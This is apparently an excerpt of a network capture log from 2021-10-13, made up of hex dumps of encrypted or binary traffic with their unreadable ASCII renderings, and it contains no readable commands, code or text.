                                                                            2021-10-13 17:30:43 UTC146INData Raw: 9a cb 30 42 53 b5 3d ff 93 f2 96 af 0d 5f e6 6c 9d 30 08 fd d0 6f 3c 89 f4 f9 5f d2 3d 97 32 71 bc 98 94 61 59 dd c5 00 9f 5c 39 f7 aa d7 e2 ec a0 e4 80 6d 0e 46 a5 89 16 13 0d 33 39 10 12 2c 67 20 c6 3e b9 06 4a 16 81 d0 1e 43 14 43 80 9c 9a 93 6d 94 44 60 c9 5d 35 a1 5f d7 88 ca bb 52 cf 77 91 08 3e 76 47 04 e0 2b fd 3f c5 ea 5d 10 1f a2 97 0a 00 75 33 9c 50 7f ec 4a 47 26 15 e8 55 ba 81 ab 05 bc 83 1b 5e 7b 56 fe e7 f3 a5 ee 4d a5 74 b4 d4 ff a6 d7 6a ad 03 fe 46 76 3c bf dd 9a c0 24 04 ef da d6 ae 18 08 2c 38 15 fa fe 4a 3c c1 7e fd 39 7f 94 5d 8d 7f 80 d6 b1 25 ab 8d 0a 70 1e 27 d4 be f2 94 05 32 fd b9 a8 99 83 c0 c2 c3 8d 99 21 1f a1 08 00 69 7c 69 d1 8f 98 25 46 d6 0b 19 d3 e2 c6 bc a8 f4 4c f0 5f 86 ae f2 48 f7 18 5f 46 6c cb e4 66 0d cc 53 6f bb
                                                                            Data Ascii: 0BS=_l0o<_=2qaY\9mF39,g >JCCmD`]5_Rw>vG+?]u3PJG&U^{VMtjFv<$,8J<~9]%p'2!i|i%FL_H_FlfSo
                                                                            2021-10-13 17:30:43 UTC147INData Raw: ee 61 f6 56 2a 02 78 50 1f 0d 0f 66 ca 1d 37 86 af cd ff a8 e7 3a 10 43 e9 9e 7a 49 94 fe a6 a7 d2 6c 05 91 7c fa e5 02 08 f7 0e 1a fe 32 4c ad 5d f5 fc 70 5e ed c8 a8 b4 f5 5b 03 7b b8 23 23 c4 8b 35 97 21 f7 08 1f 8b 68 7a 12 94 90 29 f0 9e 5c e2 d1 2c d7 56 c8 5a 63 90 57 0d e7 81 c2 64 92 b3 f3 78 e3 a2 e5 b7 8b ec 23 f1 24 b8 56 bd ce 13 c3 b9 ea 0b 3e f0 5d 6b e9 29 d3 d1 63 65 f0 07 92 87 a5 39 44 e8 24 de 47 ec 89 9b eb b3 a0 fb a8 ac 4c e0 18 e6 c5 0d ca 90 a9 25 8d f7 e6 92 50 aa 13 9a 66 49 7f bd a9 07 12 7c 5d b5 56 c7 46 4f d1 0b 8e 14 d1 de cd 38 e7 88 75 66 19 d1 e7 55 fc a2 cf 41 67 41 92 36 29 78 2b c0 dd 21 d1 86 f1 a6 e5 12 72 94 5f 1b 5f ee fe c7 cc 4e 20 8d fa 7f db 40 1e 7d d6 80 ce 8f 7b 55 d8 a3 30 f4 e1 0b 22 bf 4f b2 cf 55 be 29
                                                                            Data Ascii: aV*xPf7:CzIl|2L]p^[{##5!hz)\,VZcWdx#$V>]k)ce9D$GL%PfI|]VFO8ufUAgA6)x+!r__N @}{U0"OU)
                                                                            2021-10-13 17:30:43 UTC148INData Raw: ff 71 70 9f 0c 33 71 22 9d 36 71 7f fd 83 27 b2 4d 3f f6 0e d5 e2 f3 a4 7d 8b 6f 0e 57 a7 22 6a 8a 0a 19 bf 4e 56 2f 67 24 7c 8b 96 14 6c ac 79 ff 0f 65 14 96 a9 9c 9a ac d6 9a 69 62 d1 73 32 25 21 48 a3 48 c1 eb 10 75 95 28 35 51 6a 16 5c 2e 0e 2c e3 ca ec 5c 34 a2 b7 a1 2d 5d 1e 89 78 54 c4 cc 3f 95 96 96 c8 9b 5e ad 25 2e 1b 3e 73 f3 55 f3 29 d7 85 7c 6f fc 5f 94 61 c6 a9 ff 5f 87 2e fa 6c f6 68 a4 a2 03 c5 04 e0 cd 49 d4 34 3d bf 1b 33 24 3c dc d9 3e e1 16 f6 8e 59 8b 51 b2 7a af d4 b7 09 07 71 ed e8 1f 23 f0 7f 64 96 05 a8 42 b1 97 ae 85 01 54 c1 8d b9 75 8c 87 08 1f 55 7c 69 d1 8f 98 25 46 d6 0b 19 d3 e2 c6 cb a8 f4 4c f0 5f 86 ae f2 48 80 18 5f 46 6c e9 e9 66 0d c3 53 6f bb 26 5e 79 6b 4a 97 03 8c ee 1e db fc 4d a2 cb 28 0c 5c 2c b8 f7 1b 8b dc 17
                                                                            Data Ascii: qp3q"6q'M?}oW"jNV/g$|lyeibs2%!HHu(5Qj\.,\4-]xT?^%.>sU)|o_a_.lhI4=3$<>YQzq#dBTuU|i%FL_H_FlfSo&^ykJM(\,
                                                                            2021-10-13 17:30:43 UTC150INData Raw: 9c 70 79 e8 67 a7 3d f3 61 17 b4 5c 4c 7d 27 25 c5 c9 1d fd 31 55 85 50 d6 d1 76 74 74 a7 19 98 f7 5f 25 e6 3c 5d ba 5f ae 1c a5 03 d4 bf 1d 11 4d 77 e4 95 b0 2d ec 97 74 ef e1 01 d1 7c 55 35 d2 bc 55 09 c1 13 46 1a 0b 28 d6 51 d2 81 c6 0f 89 76 06 fc db b9 76 b8 d3 3b ee 9b a9 20 14 76 3c fd c0 04 d5 f1 dc 4d 76 79 91 a3 88 2f 42 ce 9e dc 47 76 8c 43 de 95 80 e2 a7 84 61 c2 4a cd ef 8b ab 06 80 08 8b d7 5a ba d2 d4 10 be 4b 5f 79 9a 10 05 12 e6 58 99 6f e1 66 57 db 23 a3 36 b0 f5 e7 be 87 39 59 64 1d f7 76 d5 82 3b 54 64 4e 73 bc 15 92 7a b1 e5 d0 3a df a6 f9 ba ea 3a 7f ff 72 1d 75 74 a8 73 cf 4e 22 87 c0 03 42 41 84 5c db 9b eb af c7 cd fd 8e 02 cb e9 02 21 a0 59 ba 8d 7a be 2f ea 73 b2 5d 27 98 79 ff 06 b7 28 5e 3e ce 0e 82 16 61 30 cb 3c 99 df d9 8e
                                                                            Data Ascii: pyg=a\L}'%1UPvtt_%<]_Mw-t|U5UF(Qvv; v<Mvy/BGvCaJZK_yXofW#69Ydv;TdNsz::rutsN"BA\!Yz/s]'y(^>a0<
                                                                            2021-10-13 17:30:43 UTC151INData Raw: 31 fb 9b c7 14 38 96 90 97 81 2e f8 0b b1 c2 81 01 1d 1c b9 d5 02 35 7d 90 8a 98 64 23 3e 13 0b 75 0e ff d1 7e c0 a5 04 e6 6d 15 f8 74 31 8e 2c d8 66 ae 37 04 4e 76 59 9d 7f 8e a1 a3 7b 7a b7 e7 f3 75 26 33 de 3e 0c b2 45 4b 14 cb d7 ab dc b7 ea 44 46 f9 73 24 96 5c ba 84 bf ed 22 08 ea 05 e0 1a fc 9a 87 2d b9 5a 89 7f 1e 7b 51 b0 48 e1 05 54 cd 48 83 bf 08 a7 1b 16 11 98 f5 c2 28 dc 3d 83 b2 4a 84 5f 9c 53 b9 d0 e6 19 95 28 5a 9b 76 26 cc 94 5e b8 2a 3c 47 b7 a7 f6 c0 f9 5d cc ee e7 0c ba 97 60 73 68 55 32 c5 bf af d7 0a 73 48 8c 5c 04 2e fc 29 74 bf a9 be 60 6c 0b a1 bf c7 c0 ac 83 a9 02 f5 f3 0b a0 90 37 b3 9d 8b 27 c8 ec e1 4e 06 d1 de 0b a2 4d b8 fa d0 b6 fd 6c de e8 72 34 dd a3 c4 61 ac a7 51 53 f3 54 dc c9 a4 f7 1e e3 1a 1d 24 27 85 0d 0e 8a 7f 9f
                                                                            Data Ascii: 18.5}d#>u~mt1,f7NvY{zu&3>EKDFs$\"-Z{QHTH(=J_S(Zv&^*<G]`shU2sH\.)t`l7'NMlr4aQST$'
                                                                            2021-10-13 17:30:43 UTC152INData Raw: 73 e5 f7 ea 26 a4 3c 47 f3 9f 61 35 90 8c f8 28 bb 31 a3 50 3c 8b ce 31 17 99 c9 ef 72 a7 d7 27 8e 9c 6f 9a 74 4d 6d ac dd 1e 51 8c 75 a8 04 ed 23 c7 43 e5 90 d0 25 d7 97 4f ad a8 f2 36 da e9 1b bf dc 9e 7a 66 03 4a 8e cb 17 89 9d b7 19 8a 74 78 c0 f6 50 19 98 d6 e1 7c ce fc 57 d2 b4 b1 ea a4 8f 63 bc 2d fb e7 80 ba 18 a5 3d ce e4 5f 90 4d b5 9d aa 4a 78 7d bb 60 1b 0a 6f 30 9b 5c f5 60 77 ed 0e 82 2d f9 e1 d0 94 a9 3e 69 40 2d c2 64 6f cd 97 65 bd cf 98 72 d5 69 b5 e5 20 2e f8 69 14 64 2a 23 ef 83 43 87 ca a6 fa 49 8f 1d 97 fb 7d 90 ac 1d e4 6c bf 1f 6f 06 51 2b bd 36 4c e3 0c 7a bc 93 7a a5 6f 1a a0 4d 9d 0b bc 64 89 d9 6f 8f 24 3a 49 2a d0 ed 7e ae 0a 9d ad 9a d5 9d 3c 5e 72 2d 8a 3d 49 9c 73 22 f4 0f d0 ed 0b d3 9f 6c 24 09 ea bf c3 7f c6 29 10 53 41
                                                                            Data Ascii: s&<Ga5(1P<1r'otMmQu#C%O6zfJtxP|Wc-=_MJx}`o0\`w->i@-doeri .id*#CI}loQ+6LzzoMdo$:I*~<^r-=Is"l$)SA
                                                                            2021-10-13 17:30:43 UTC153INData Raw: 23 69 dd ce df db fe 8e af 47 65 c6 61 5f f8 52 df b9 48 81 b1 c5 38 9a 37 f8 2d 1e 44 71 38 bd 49 84 b0 e3 7d 7d cc db cc 1a 51 17 bf 4d 2a 94 64 6e 30 b6 f1 97 9e ef 83 1b 5e f9 61 3f b5 24 dd f0 d5 9e 30 41 a8 7b 9b 72 82 e3 90 27 cf 37 e5 09 38 4b 7f a5 37 8a 29 4d 96 58 cf b5 26 e7 7d 3a 25 fd e6 b4 1f ed 52 f3 ba 23 f2 3b f0 3c 97 ec d9 4a ff 6c 5d fc 76 0b ba e6 54 ac c1 ed f1 09 4d 48 67 39 d4 01 42 54 c8 72 1e 8f 99 fa dc 9f 0c 06 14 90 48 60 64 98 55 2c 6e b3 46 10 aa 97 ca 18 55 36 84 95 ba bd af a7 9a 35 c1 b4 60 d2 ec 44 db f3 f7 58 9a e4 d2 2a 4f d6 ee 3a c3 24 d1 96 f3 9c 8e 14 9a 8c 4d 58 bc d9 b0 1d a4 a7 72 6b d8 4e d7 8b ed be 65 d4 2c 55 5b 1e e7 7e 61 80 6c 80 52 53 d6 a1 72 b3 a8 6a 9e 57 e3 54 e3 cc d1 e2 a1 f4 6d 40 fb c5 51 31 80
                                                                            Data Ascii: #iGea_RH87-Dq8I}}QM*dn0^a?$0A{r'78K7)MX&}:%R#;<Jl]vTMHg9BTrH`dU,nFU65`DX*O:$MXrkNe,U[~alRSrjWTm@Q1
                                                                            2021-10-13 17:30:43 UTC155INData Raw: 99 e9 c3 67 f9 98 5c ec f5 0f e0 5a 64 75 bc f7 31 69 b4 52 b0 3d c4 5d a9 25 82 bb 9d 73 ef 9e 6f 8c b0 ef 2b c6 9a 14 e7 a6 e5 3e 3f 74 2e f6 e4 2d ed d5 d6 70 e5 11 15 87 a3 27 7b c7 cf eb 56 e9 be 45 d4 a9 8d c6 82 be 62 cc 3e c2 df 85 9d 26 81 10 ff d4 37 8a 3e c6 e7 d4 3a 36 3d fa 72 79 70 1f 6a a7 f9 54 ac bb 43 a1 3c 8d 42 49 03 27 09 83 96 f1 e2 7f b3 87 2c 79 86 ae 8b c0 57 c2 47 b8 ed 10 57 ee 1e 7b 1a 05 25 f4 99 20 eb a5 ca c2 3c ec 16 ed 91 00 9a d3 77 f0 57 f9 5a 36 53 0e 63 fa 0a 70 c0 40 63 d7 8c 78 8e 2e 6b d8 3c a7 66 d7 40 dc b8 03 a1 7a 1d 47 30 db a1 49 bc 5f a2 e6 9f fe b4 13 77 59 03 b8 50 35 cd 7d 44 8c 35 f9 9d 0e bc a1 04 50 78 d3 f5 e7 6e cc 15 6e 20 3f b5 a0 0f 15 c6 e9 c3 da d1 a6 03 d0 38 50 5b 39 f4 c7 61 97 e2 6a 52 dc 1e
                                                                            Data Ascii: g\Zdu1iR=]%so+>?t.-p'{VEb>&7>:6=rypjTC<BI',yWGW{% <wWZ6Scp@cx.k<f@zG0I_wYP5}D5Pxnn ?8P[9ajR
                                                                            2021-10-13 17:30:43 UTC156INData Raw: c5 02 3f 72 0a 76 ff 15 a8 9a f7 7f 3b 9a e4 89 61 40 73 b9 3f 16 ce 48 42 06 94 9f cc e3 d3 8f 1c 7a 85 54 0f a5 5d 8f da 8a de 56 10 f9 62 ac 4c e4 9c f1 50 af 1f 91 6f 5f 39 26 a4 2a fa 08 2b bb 7a ea 9b 29 9c 39 29 34 fd fa ff 08 1b b4 06 54 9c 5e 88 07 98 6f 07 64 e0 54 f4 a1 32 d7 ec 19 48 ab 4b cb e5 8b 5f 55 52 66 69 cb 65 2d 38 e5 48 7b f0 e8 81 88 b4 33 7a 6a fb 29 40 68 f3 2f 27 09 d7 5c 02 b9 c8 b4 4f 47 35 93 ec 82 8a 87 8c b5 07 fe 9c 5d c4 ce 3e b2 c8 d3 61 90 86 9a 01 66 b2 ad 7e df 21 c5 c6 fe 97 d4 7b 83 b0 21 71 97 e9 86 22 d0 df 1d 0f a7 65 de e7 95 c7 02 e3 33 2c 1a 1e b2 2d 6b 85 78 8e 18 b6 27 48 9d 74 5c 8e 26 bb 00 ac 1a 71 3a 00 55 00 91 e6 55 74 a2 c6 df 43 2d f4 76 47 5e 73 ba 84 40 dc cd 4a 22 49 69 11 ce 17 37 f1 1f 1a b5 50
                                                                            Data Ascii: ?rv;a@s?HBzT]VbLPo_9&*+z)9)4T^odT2HK_URfie-8H{3zj)@h/'\OG5]>af~!{!q"e3,-kx'Ht\&q:UUtC-vG^s@J"Ii7P
                                                                            2021-10-13 17:30:43 UTC157INData Raw: 54 e1 96 e4 3f bc ca 1b c5 d9 84 47 b5 8d 7b b3 fb c7 3d 02 74 39 ca ca 15 fb cc c9 7a c8 2c 28 89 e9 2e 4a e2 b6 e3 7f c0 ac 6c c0 82 9c c4 83 92 64 e4 13 f7 d6 48 7a cf 75 ab 14 55 c1 6e b5 6b 5e 76 9e 96 88 42 db e1 fa b7 ab 6b a8 55 b6 8f 07 fb 71 c1 10 0e 46 18 68 f2 97 d6 c0 12 ac a4 0a 4b a0 84 f1 f5 00 de 6a 97 c7 2b 0f cb 0e 28 5c 61 1c c3 af 42 88 da d2 e7 02 d7 1e ff aa 2c d5 ef 7a f0 31 c3 70 1a 75 30 4c ca 79 18 93 6e 4f 94 a1 37 c4 0c 7e cc 28 a7 6e dd 0b e1 8f 2c db 60 1b 7a 07 da 83 66 87 78 a3 d3 84 cb 85 37 48 7c 30 89 26 be 56 86 ca 09 dc 74 17 e4 26 28 f2 cf d2 16 79 27 cc 78 f0 94 ad 9a f3 ed 4b 5b 8c 84 98 e0 9e c2 74 fb 25 73 6c 0d dc fd 46 fc c2 42 6a f5 3c 8a 30 a3 24 e4 72 c2 aa 00 9e 44 fe 1a 11 cb 58 89 b2 fa 6b 0f 74 c0 60 96
                                                                            Data Ascii: T?G{=t9z,(.JldHzuUnk^vBkUqFhKj+(\aB,z1pu0LynO7~(n,`zfx7H|0&Vt&(y'xK[t%slFBj<0$rDXkt`
                                                                            2021-10-13 17:30:43 UTC159INData Raw: 11 8d 9d d1 ab 9f 82 00 1a b7 3c 6b c0 6a c8 c8 ff b3 44 7f 81 75 80 5d f1 9a e0 4c bd 2b 24 88 ae d6 f6 7b ea 14 e3 c0 1a 9c 13 6b d0 52 fb e5 f9 3c 3f 25 d7 2e 9e 2b 70 bc 7d bf 7d a7 75 03 6a c5 69 f4 8f 05 ef c1 0c 5e 85 63 ee d1 92 7f 41 57 54 07 a7 3d 76 66 cd 60 22 b1 a5 a2 d1 d7 56 07 19 8c 78 24 04 93 6f 54 74 a1 3c 70 d1 f4 de 0e 2c 4a fd f3 b4 f0 e0 d4 f5 41 e7 99 7d e3 fe 1f 9a f2 c3 74 84 a2 a5 3f 4d 94 dc 7d fe 15 ec a7 a3 d4 b9 3d ab ab 32 61 bd ea 90 28 27 0b db db 53 8c 1c 16 68 22 de 0d d7 c4 e2 d1 79 d1 9e 7e 82 67 ff ee 0d 54 9c 52 46 d4 64 a7 66 de 68 66 26 30 6b 28 ac c6 63 6c de b2 a5 31 74 ab 30 21 3d 4a ce d3 07 9d cb 78 39 46 6c 3e a8 61 1c b8 61 73 82 08 56 ef 60 51 d8 f4 fe 18 ff 00 68 5d 96 26 c4 ab 2d b8 20 73 db df 15 25 77
                                                                            Data Ascii: <kjDu]L+${kR<?%.+p}}uji^cAWT=vf`"Vx$oTt<p,JA}t?M}=2a('Sh"y~gTRFdfhf&0k(cl1t0!=Jx9Fl>aasV`Qh]&- s%w
                                                                            2021-10-13 17:30:43 UTC160INData Raw: f4 d3 d0 54 c5 26 c3 55 41 e1 af 08 44 1f 91 61 63 bc 05 7a 2a 6b 3c 4a aa 3e d4 31 32 5b 63 98 22 b6 17 4e c2 1a f3 03 2f 1c e7 a4 b4 63 e2 f1 fd 8f 9f 11 c0 60 f4 e5 6a 85 14 ab 1d 37 1c 5b 68 f4 87 d1 c0 0a c2 d9 66 25 de ff 86 ff 35 96 17 e8 be 1b 78 bc 71 1c 70 7e 28 a1 ca 08 d9 d0 b9 ea 02 db 50 d5 89 58 b2 9b 66 fb 3a fc 57 36 16 52 65 f1 68 07 f4 0a 3e b6 9d 0b e4 79 63 e5 08 9f 51 ff 6e e7 7d dc 20 8f cb 94 bd 5f 7f 86 60 df 56 34 60 54 5b e2 99 f7 b0 0b ec de 26 a5 a0 6b df 5d 37 db 3d 23 b9 c0 fb 3d 7e 17 f0 4f ee d3 bc ad c2 9c 2b 5f f3 d8 81 9f e7 e2 39 96 1d 3e 34 2a 84 aa 06 d4 c2 0f 27 a9 61 e4 49 84 68 99 06 b9 f0 30 f7 3f ca 07 45 a1 26 90 81 f5 1a 65 74 e5 5e b0 bb bd 60 41 c6 85 11 7f 5b 63 66 11 1a 9b d3 40 6e 98 fb 07 8c 43 92 76 63
                                                                            Data Ascii: T&UADacz*k<J>12[c"N/c`j7[hf%5xqp~(PXf:W6Reh>ycQn} _`V4`T[&k]7=#=~O+_9>4*'aIh0?E&et^`A[cf@nCvc
                                                                            2021-10-13 17:30:43 UTC161INData Raw: 7f 0c a0 5f f6 0c 95 a0 e7 e8 71 c6 10 e2 f9 73 a4 6d 44 a4 7d b0 a6 aa 68 3c 6f da 68 cf 70 24 f6 20 a1 64 aa 05 6b 41 82 73 ae db 4d bd f8 5e 14 ec 1d bd b7 e4 33 01 05 30 75 8b 6c 06 10 8e 3e 10 95 9a fe e6 d0 77 16 01 ca 01 03 25 b3 6b 4b 6d 88 04 4a e5 fb dc 19 17 73 c3 e8 aa e8 ff f1 da 2d 8b b5 31 98 a0 5c c2 a3 b0 59 80 45 04 90 a5 22 24 ff 01 b6 41 1a 2d 08 18 88 06 45 82 d3 6a 0f 2d 9f 3e 36 ae a4 15 d7 45 4b 2b 51 97 12 f2 ed c7 c1 72 ff be 00 8b 7d 99 c7 4c 24 eb 2e 2a ef 47 c7 67 c9 6f 03 57 0e 69 2f b2 ea 44 2f b9 c8 d4 5d 30 e0 2a 09 0d 7c ae a5 70 ee 8a 35 15 2e 11 56 b4 21 46 a1 7f 6c db 64 55 cb 43 79 ed c4 81 7b da 39 55 54 ad 0d fe f6 15 8d 09 58 e6 e7 3d 06 61 bd eb 62 c9 d8 69 75 e6 83 4a 36 c7 de b5 13 14 7c ba 43 37 68 a3 e4 8c 67
                                                                            Data Ascii: _qsmD}h<ohp$ dkAsM^30ul>w%kKmJs-1\YE"$A-Ej->6EK+Qr}L$.*GgoWi/D/]0*|p5.V!FldUCy{9UTX=abiuJ6|C7hg
                                                                            2021-10-13 17:30:43 UTC162INData Raw: c4 43 7b 72 26 1d 0d a6 89 23 59 20 c4 6b e6 75 a4 d5 1a e5 0c 21 3a 60 9a 69 ad c0 92 5d 6c ce df db c8 6a 9f 57 f6 b8 d7 3b 71 69 dc 8b 28 6e 16 e5 84 ce 31 7b 6d 37 72 2c 57 ab 8d 22 86 ed 5c 95 2c 52 a4 3d 14 3c 8e 68 fd 54 89 b7 80 e5 c8 74 a1 65 4a 0f bd 9d 2b 3a 19 a5 f5 a4 14 f0 d9 2c dd d0 96 05 25 5c 28 1f 2c bc ae 37 be fb 4f d3 7a 4c 6b 29 ca e5 0a db 79 c7 7e 00 62 dc 33 83 6c f8 c1 ae ae 13 b0 7f 87 b9 6f df 91 eb 56 d2 40 4f 5a 90 88 93 71 8e 73 8f d9 19 dc 08 c3 03 f6 aa ee 7d dc 49 2a ac 6a 7f 8a cd 05 fa 78 49 08 e7 e0 ea c9 c8 26 a1 f8 ed 72 cd ef 77 68 1a 25 2d a6 f6 e9 6e 9a d8 e9 6a d3 e6 a4 7a e0 b6 4d 6a 7b ab bf d4 68 62 16 5f 46 4c 07 f6 48 3d f5 48 72 8a 17 61 53 e9 34 0e 06 8c 8a 3e 38 fe e1 21 51 0d 02 33 0a 98 18 9d 8b dc 07
                                                                            Data Ascii: C{r&#Y ku!:`i]ljW;qi(n1{m7r,W"\,R=<hTteJ+:,%\(,7OzLk)y~b3loV@OZqs}I*jxI&rwh%-njzMj{hb_FLH=HraS4>8!Q3
                                                                            2021-10-13 17:30:43 UTC163INData Raw: ba 7a a5 92 f8 a6 e9 f7 e4 0e bd 5c bd c0 8e 0f dd ef ab f7 be 52 8f 70 6d c8 e3 52 79 b6 c0 ab 06 75 31 cc 0e 07 d0 74 bc 18 0a 2d c5 92 0f 8b 0b 69 05 99 82 29 16 b0 87 e5 d5 2c d0 63 ef 3e fc 91 f2 17 62 23 c6 64 c6 26 73 4f e0 84 43 12 7d e4 31 d1 e2 8f a2 b5 ab 39 54 a6 ea 0d 12 76 eb e6 dc 19 d1 f1 37 46 d0 34 1e a2 c7 1a a4 e0 9b dc c8 fc 0c 74 da b3 05 cc 62 ac 77 e2 29 eb 29 a3 b2 09 2e 35 2c cd 5a 90 52 84 2c a5 4d 5b 0c 8a b6 1f 14 7c f8 b8 23 da 40 50 dc 31 06 0c da da 1e a3 99 11 db 64 18 d4 5c 57 ee a2 be 71 be 7b a6 16 08 67 df e8 ef 2b 53 9b 05 91 f8 3a 7b b7 ab 35 67 68 93 4e 39 66 2e ad 49 53 57 47 8e 58 77 9e 64 a8 d5 57 4e 8a e4 c5 d7 0b fb a6 79 a9 fc 57 ab 20 d5 72 9c 70 33 b8 22 c8 86 c9 2d 45 9b d0 28 88 ea 7a 95 4b 1f b4 fe ed a0
                                                                            Data Ascii: z\RpmRyu1t-i),c>b#d&sOC}19Tv7F4tbw)).5,ZR,M[|#@P1d\Wq{g+S:{5ghN9f.ISWGXwdWNyW rp3"-E(zK
                                                                            2021-10-13 17:30:43 UTC164INData Raw: ad 6c 0e 51 81 a3 14 13 7a 1b 74 6e 05 2c 6c 25 e6 ae 7f 07 4a 8c d5 ff de 65 ba d2 80 9c 9a b3 8e b1 44 60 cc 75 cf a3 d1 d0 a0 48 c5 cb bc 76 95 28 26 77 90 04 ea 0f d2 2e e7 ca c0 15 1f a2 aa be f1 75 a0 8a 7a 52 ee 4a 4f 1b 97 96 d1 bb 56 af b2 2f 23 1b 5e e1 08 d0 f6 d5 85 7c 98 a5 ea 95 63 d9 a6 d7 4a 92 2e fc 5b 70 c1 3d 3c 02 c3 24 00 cf ec d7 ae 18 8f 09 ca 04 6e df dc 3e c1 7e 65 99 59 94 40 9a b4 ad 60 b0 26 81 0f 74 06 1c 27 d0 83 66 78 05 8b 66 9e 84 88 a5 59 4f c1 8d 98 03 49 87 b3 01 73 55 44 d3 96 9a 0f c4 a9 90 ea d3 5d e7 2b ab f4 4c 9e 60 ab bf d5 6a 94 1a e4 47 4e 70 c2 66 4e df 7b 42 b8 24 a2 53 52 35 0c 02 8c ea f9 27 fe 4d bf 51 07 20 f6 0b 9a 15 19 8b ae 36 50 25 95 63 6a ae 78 15 d3 44 4e 2b 61 aa 58 9e 8c a3 b1 12 44 c8 22 ce 39
                                                                            Data Ascii: lQztn,l%JeD`uHv(&w.uzRJOV/#^|cJ.[p=<$n>~eY@`&t'fxfYOIsUD]+L`jGNpfN{B$SR5'MQ 6P%cjxDN+aXD"9
                                                                            2021-10-13 17:30:43 UTC166INData Raw: fd 76 71 64 a5 33 b4 f5 56 09 dc b8 22 23 cf a8 8d 98 06 d7 28 01 13 75 5b f6 63 8c bc f2 96 74 67 f9 3c d3 7d 4a eb d0 81 55 08 c7 8d ef 74 90 28 d6 d6 d1 94 c7 0e 89 7b 2e c1 cb 9e 56 4f dd 2b ec ba ea e4 1d 66 21 f3 e8 13 fa fc d8 66 f0 86 00 af 8a 2a 62 e3 a9 cf 45 ed a9 d3 d9 be a2 e5 a4 a0 7f ef 1a e1 ef 10 bb 1a aa 24 89 73 7d db 52 ab 89 a9 57 4b 5b 9c 13 66 1c 6a 63 b2 78 55 40 43 da 75 23 64 d0 98 f9 e8 19 1d 73 26 03 a7 dc 93 fd e2 4b 32 ca 11 b3 56 8c 7c 2d 52 fb 38 fb d0 71 cb eb 7e 41 c0 df 11 72 2c 9e 58 cb dc 22 be 44 2b 5b 32 85 10 e5 c4 68 a3 c0 1f c6 f5 90 29 c8 43 3c f6 d9 d8 e5 1f a0 79 75 b7 9b 38 3b 9e 79 47 86 da b3 09 be b8 2f c5 0b 37 b0 5d 1e f9 d3 a9 2e dd a2 8e 27 af 30 3a b2 41 74 c0 d2 ba ef ef 8e 1d 91 b1 94 68 9e aa 42 af
                                                                            Data Ascii: vqd3V"#(u[ctg<}JUt({.VO+f!f*bE$s}RWK[fjcxU@Cu#ds&K2V|-R8q~Ar,X"D+[2h)C<yu8;yG/7].'0:AthB
                                                                            2021-10-13 17:30:43 UTC167INData Raw: 69 33 c6 ae ca 1a 77 de a7 68 36 51 37 1f b6 73 87 22 be c4 de e2 21 15 eb a8 61 6b 52 fa 66 d2 3b cf 9c 4c e3 16 b7 9b e8 a6 ea 31 9e 54 04 6e 68 55 19 bb c0 4c 72 83 ba 09 78 01 71 4a f4 5f 85 76 26 87 69 63 f3 f4 5a 74 cc 8a 81 f2 98 2d e9 6a 76 10 af a5 10 c3 72 80 bd 48 e7 82 4e 12 05 12 37 f0 88 59 fa c0 4d f1 d8 d9 d6 5a a9 7b fb 54 47 22 b2 23 22 69 dc 20 e3 b2 30 16 6d 30 54 b0 d3 08 54 e9 65 ed 8b 99 73 a6 17 15 06 71 26 45 e1 8d 98 0f c8 af a0 1a d5 e6 22 28 98 f6 4a 6a 38 ac 8d d6 6e 62 ec 5e 74 4e 77 c2 14 0c a5 64 44 b9 54 59 6a eb 32 0e 0e 8b d3 3c 3e fe 8e a5 63 0f 27 4d 78 99 84 04 8d dc 45 51 17 96 67 7c a3 a3 26 d3 42 4e ef 6c 9f 5a 98 91 e1 af 21 9a cf 20 bc 38 d0 ec 7f 0e b2 07 3a c1 7e ea 58 e4 70 31 68 50 e9 49 fd ae 09 31 c7 d5 fb
                                                                            Data Ascii: i3wh6Q7s"!akRf;L1TnhULrxqJ_v&icZt-jvrHN7YMZ{TG"#"i 0m0TTesq&E"(Jj8nb^tNwdDTYj2<>c'MxEQg|&BNlZ! 8:~Xp1hPI1
                                                                            2021-10-13 17:30:43 UTC168INData Raw: f6 b3 10 29 fe b7 06 ce 09 24 dd 7c 4a 24 fa 91 d7 09 d6 19 b2 65 4d 21 da 55 f2 84 c5 0f 09 ec 32 f1 bb 9e b3 b5 dc 3b ee bb ea 0d 94 76 35 d2 9a 28 3c f9 d6 67 f0 07 08 a2 08 2b 74 e8 ef dd bd e4 a7 6e cc b3 a0 e4 24 84 77 c2 6a e1 eb 82 a4 09 a8 25 89 d7 dc 90 46 8a fb be 40 52 49 9d 13 05 12 7c fd b4 68 e7 34 51 c8 2a b3 16 6d 86 e7 be 99 11 65 66 11 f6 fb 5f ed a2 f1 3b 4a 53 b4 16 83 7a e5 d5 1b 29 e8 86 a1 d9 ea 3a 5f 96 4e 1d 68 6b 66 5c dc 4e 24 cc 46 7d db 40 95 58 2a 84 6e af d6 57 44 c1 10 ed c9 0b 33 a0 08 99 8b 5e af 2f d1 22 9a 70 25 98 6e d5 8e de d8 56 2f ca f2 eb 15 61 30 51 08 b4 bf fe 28 10 b2 c3 b1 92 b0 78 b5 0c 7b 96 20 4d b7 a1 81 4b 35 1e 93 25 80 fc d4 c7 d8 ba fc 0c cb f1 5d c0 ca bc 1a b7 5f 1e 63 79 f7 81 38 8e eb 53 0b 85 49
                                                                            Data Ascii: )$|J$eM!U2;v5(<g+tn$wj%F@RI|h4Q*mef_;JSz):_Nhkf\N$F}@X*nWD3^/"p%nV/a0Q(x{ MK5%]_cy8SI
                                                                            2021-10-13 17:30:43 UTC169INData Raw: 8f 74 51 0c 76 09 8f 21 c6 ca c8 8a 1f a2 b7 be 27 75 41 8a 04 5d cb 4a 8d 95 97 96 cc bb 87 af 57 2f 92 1b 7b e1 23 49 f6 d5 85 7c 0b a7 60 80 72 d9 83 d7 72 85 2e fc 45 70 10 25 b9 26 30 26 25 cf 49 d4 ae 18 91 09 53 07 80 d5 77 31 e4 7e dd 8e 59 94 5e 9a 11 ae 86 ba 32 8e 2a 74 e9 1f 27 d0 9d 66 d0 06 53 6c 27 8a ad a5 e0 56 c1 8d 9a 01 a1 9f 12 25 80 56 61 d3 8f 9e 0f c4 ab 92 5e d0 ba ed 87 a5 d1 4c 6a 7a ab bf d7 68 24 19 0d 4d 5d 7e e7 66 0d db 7b 42 ba 26 1e 50 88 3f b5 0d a9 ea 3e 38 fe 4d a1 51 0b 39 57 2f 69 16 3c 8b dc 37 50 25 97 61 3a ac f8 1f 13 4b 6b 2b 6d ad 58 9e 92 a3 ee 10 ca c2 ef c1 1c ae f3 79 0e c0 05 03 85 7b 8b 5f 9f 46 16 6e 2b 85 48 cf ac 0f 20 ad f4 ed de 32 c9 69 ef 